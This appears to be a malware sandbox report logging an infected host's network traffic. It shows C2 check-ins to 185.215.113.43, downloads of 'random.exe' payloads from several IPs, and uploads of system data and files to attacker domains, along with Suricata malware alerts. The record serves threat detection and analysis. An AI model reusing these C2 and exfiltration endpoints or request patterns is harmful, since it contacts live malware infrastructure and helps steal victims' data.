Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 36 34 39 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1016490001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/flava/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 36 34 39 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1016491001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/martin/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 36 34 39 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1016492001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /vJNDHPUXPCEIZZjTPbLp1734325090 HTTP/1.1Host: home.fivetk5pn.topAccept: /Content-Type: application/jsonContent-Length: 500181Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 34 31 31 38 33 30 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 30 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 34 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 34 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3
Source: global traffic	HTTP traffic detected: GET /vJNDHPUXPCEIZZjTPbLp1734325090?argument=EEOgMEn0tHAhOkMu1734411834 HTTP/1.1Host: home.fivetk5pn.topAccept: /
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 36 34 39 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1016493001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 36 34 39 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1016494001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 36 34 39 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1016495001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fivetk5pn.topAccept: /Content-Length: 465Content-Type: multipart/form-data; boundary=------------------------T63B6A2NSBT32bJpWgOuSyData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 54 36 33 42 36 41 32 4e 53 42 54 33 32 62 4a 70 57 67 4f 75 53 79 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 6f 76 75 6d 6f 71 61 6c 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a da 69 55 6b c1 d1 a3 ab 5d 10 52 af 0e 3b c4 bd d4 0c 31 76 2c 16 3f 54 63 bc 4b 0d 7d c0 30 10 08 70 df 3d c7 85 af ee 4d 1f 4c 6e 08 dd 77 4d d8 1b 20 e8 a1 fc 05 bf dd 89 76 2b be 3a 32 a4 77 3c 80 d3 3b da a2 20 12 d2 09 26 81 37 10 2b 91 e7 45 bc 2d 0f 35 cf 9a e4 e8 0b 12 09 ad 6f 7c f4 62 1a dd a6 f7 cd f9 6c 67 f7 d2 9b ec 77 ad af a3 1e 3a 1d 81 55 0a 97 41 8d 25 95 86 5c 95 97 92 d9 2b e0 e5 f7 06 45 81 6c 6e fb 64 fa e1 67 54 7c 6a 4c 0b 5c ff 26 27 ba 5a d3 1e 13 ae 5a f3 19 e0 49 db da 9d 70 ab 0a 95 3b 26 6a 1e 2a d4 8e a7 27 3b 91 cd f1 5b e5 61 a1 96 ad d8 f5 58 63 f8 dc 82 ad 06 90 ad f3 88 75 89 fc 27 79 c7 49 ec 79 89 b8 50 f3 3d 31 f9 ed da 8f 8e fb 4c 50 00 c0 21 3b ac 4e fe 7d cd cb 3e 26 dc a0 29 1b ab 29 c2 73 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 54 36 33 42 36 41 32 4e 53 42 54 33 32 62 4a 70 57 67 4f 75 53 79 2d 2d 0d 0a Data Ascii: --------------------------T63B6A2NSBT32bJpWgOuSyContent-Disposition: form-data; name="file"; filename="Covumoqal.bin"Content-Type: application/octet-streamiUk]R;1v,?TcK}0p=MLnwM v+:2w<; &7+E-5o\|blgw:UA%\+ElndgT\|jL\&'ZZIp;&j*';[aXcu'yIyP=1LP!;N}>&))s--------------------------T63B6A2NSBT32bJpWgOuSy--
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fivetk5pn.topAccept: /Content-Length: 58949Content-Type: multipart/form-data; boundary=------------------------7pC2pD8S68iPrFxOagvxhMData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 37 70 43 32 70 44 38 53 36 38 69 50 72 46 78 4f 61 67 76 78 68 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 51 65 78 61 74 69 66 65 70 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a dc 19 b3 b5 70 57 2e fb 58 56 19 d2 9a d7 02 20 ab 30 a6 1d 83 af 55 4d 4d f9 b1 69 c8 a5 71 88 c3 c2 57 af c4 62 37 d2 f1 f2 8a cc 1a 9b e2 94 33 d2 a8 ff 2f e1 e4 45 43 f1 58 a5 f1 3f 86 4d bf 93 4c 6b bf 5d de 7b 8d 5b 64 53 9a b6 24 03 8d 6a 6a 95 e4 e3 92 fd 39 13 f7 33 e3 d1 d7 49 d4 df 47 78 2d 85 a2 f5 86 c9 1f fc 62 7d 86 5d 6d 7e 56 ef 66 02 89 7d c9 d2 03 b9 de 91 ae 6e 8d ac 00 63 90 53 dd 71 3c 42 6f 3d 0c ac 4d 3b 68 d1 74 0a 9e a9 0a 00 25 32 3d 87 f8 2b de cd 6d 25 82 b0 32 a1 da a1 68 42 e3 a9 3b 9b e7 bf 0f f3 82 21 e6 23 69 45 6a f0 9a d8 ed df 53 fd 21 08 bd f9 fe 60 83 63 39 3c 83 93 e3 9f ae b7 6a a9 a8 00 e9 53 a4 b9 43 01 3b 3f e6 40 be d4 a4 ac 01 0e 2c 4a ad 71 34 1b d2 a3 5f 53 bd f0 75 85 c8 18 60 b5 05 55 4d 69 68 15 6c 57 19 b6 6a 12 fd 4e 5e 05 99 da 58 40 e4 db e2 39 ff 1a fe 40 6e 4b a3 fe ca e8 aa 54 fe 63 5e 2c a8 22 97 e6 09 39 2a 38 2e e3 ce b1 20 c7 da 06 bf b8 11 61 35 71 92 48 6a e4 1e 06 eb 4b 46 cf e8 d8 cd 3c 72 83 2d d8 63 72 12 78 80 ac b2 84 7b 3d ef 94 67 d1 e1 2a 52 ba c7 33 e4 2e 33 94 44 c8 e4 a3 da 61 40 73 8f 94 04 56 5a 7c bd 14 16 15 8a 78 38 64 48 61 ac e8 20 00 ce 7a 76 7d fc 20 8b 3f c5 49 e9 90 f4 1a e4 9d 91 be 3e 07 5b 2e 59 15 9d c2 b9 37 d9 78 c6 91 b7 10 f6 83 20 c0 20 c6 af 8b 34 ef 5e b3 ce bb 2b c1 79 75 13 39 8c b1 6b b4 9b a1 15 df 60 09 15 d0 f0 a1 6d f3 b8 78 76 c7 e2 12 c6 b3 19 f5 88 55 0a 67 83 48 97 cb a2 40 35 cc 0f 77 d6 6b 18 25 a6 f6 e4 56 ca 0d e5 86 4a e1 4f a8 c7 1e e1 09 e4 85 33 f0 9a 46 88 75 d5 83 59 04 f2 e4 06 64 27 45 3b 3b a0 b3 0e 33 61 ce ca a6 60 0e 15 38 7e 9d 56 4f 62 21 20 b3 19 74 33 a7 bc 62 bf f3 a2 5f d4 d6 1a ae f4 fd a4 86 57 5c f6 ad 7d 25 50 a4 a4 64 5b 03 5e dc 2d a4 9e 42 80 ad 02 eb 89 68 6d 4d cf ba 9a 73 0d 83 13 98 7e 1a cc aa 34 27 7c 4f 29 ba cf 8e 45 b7 20 9c b8 39 21 c4 10 f3 2e fc f4 ec ef 29 7f 5c 27 18 b4 d0 03 b5 52 91 c7 90 c4 ac 7a e7 59 c5 c6 f9 86 3c 4e 44 00 50 ab 86 4a f5 06 f3 63 1e 97 a3 61 73 24 98 69 ad fa 6e 53 82 f7 03 a9 1f 74 74 80 21 a6 5e 76 11 6a f5 36 8c 06 b2 72 51 98 97 a1 cb 2d 10 f0 40 44 d1 80 0d 93 73 17 19 56 52 05 c1 df 3a 0a 68 bd 15 1c 06 a7 0e 8b 5f 04 45 b2 1b ff 07 b0 fb e4 44 ae c4 ff d2 4b 93 b3 da 1b 72 4a 5c 66 01 a6 09 67 30 52 45 b8 54 f5 a0 3f 77 29 c1 f1 e3 42 84 12 48 f0 de c8 6c b6 cd 07 09 e9 94 e3 4c fd 13 20 82 de e0 33 0c

Source: Joe Sandbox View	IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View	IP Address: 104.131.68.180 104.131.68.180

Source: Joe Sandbox View	ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49830 -> 31.41.244.11:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49849 -> 104.131.68.180:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49850 -> 31.41.244.11:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49856 -> 178.62.201.34:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49866 -> 104.121.10.34:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49882 -> 31.41.244.11:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49902 -> 31.41.244.11:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49933 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49951 -> 104.21.2.110:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49959 -> 104.21.2.110:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49958 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49967 -> 104.21.2.110:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49975 -> 104.21.2.110:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49982 -> 104.21.2.110:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49988 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49990 -> 104.21.2.110:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49997 -> 104.21.2.110:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49996 -> 104.21.2.110:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50004 -> 104.21.2.110:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50007 -> 104.21.2.110:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50014 -> 104.21.2.110:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50035 -> 104.21.2.110:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50045 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50050 -> 104.21.2.110:443
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49995 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50058 -> 104.21.2.110:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50069 -> 104.21.2.110:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50073 -> 104.21.2.110:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50075 -> 104.21.2.110:443
Source: Network traffic	Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.5:50076 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50077 -> 104.21.2.110:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50079 -> 104.21.2.110:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50084 -> 104.21.2.110:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50088 -> 104.21.2.110:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50074 -> 104.21.2.110:443
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:50087 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50090 -> 104.21.2.110:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50089 -> 104.21.2.110:443
Source: Network traffic	Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.5:50096 -> 185.215.113.16:80

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: immureprech.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: deafeninggeh.biz
Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sweepyribs.lat
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 47Host: sweepyribs.lat
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=ERH0HPPRLD0I8WLVSJ5User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12841Host: sweepyribs.lat
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=0GUV91G3AMJE5AW3BUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15071Host: sweepyribs.lat
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=BFZB2L4IIHHBWMH4JYUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20567Host: sweepyribs.lat
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=HXEVX09XAMOFXG3User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1303Host: sweepyribs.lat
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sweepyribs.lat
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=JWH8D1AZGP8CYN5User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 596050Host: sweepyribs.lat
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 47Host: sweepyribs.lat
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=NH56WO0SVSIJ14IEUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12823Host: sweepyribs.lat
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=KQFC11SHQXT4User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15041Host: sweepyribs.lat
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=297VITUIUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20507Host: sweepyribs.lat
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=JOIYIG6IKUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1284Host: sweepyribs.lat
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=4URP9LP9QUWUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 29532Host: sweepyribs.lat
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sweepyribs.lat
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 82Host: sweepyribs.lat
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 47Host: sweepyribs.lat
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=225CZ2MOUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12775Host: sweepyribs.lat
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=XR66J1O2UAEJRPUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15053Host: sweepyribs.lat
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=WB9I5LPDIK09YI6IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20555Host: sweepyribs.lat
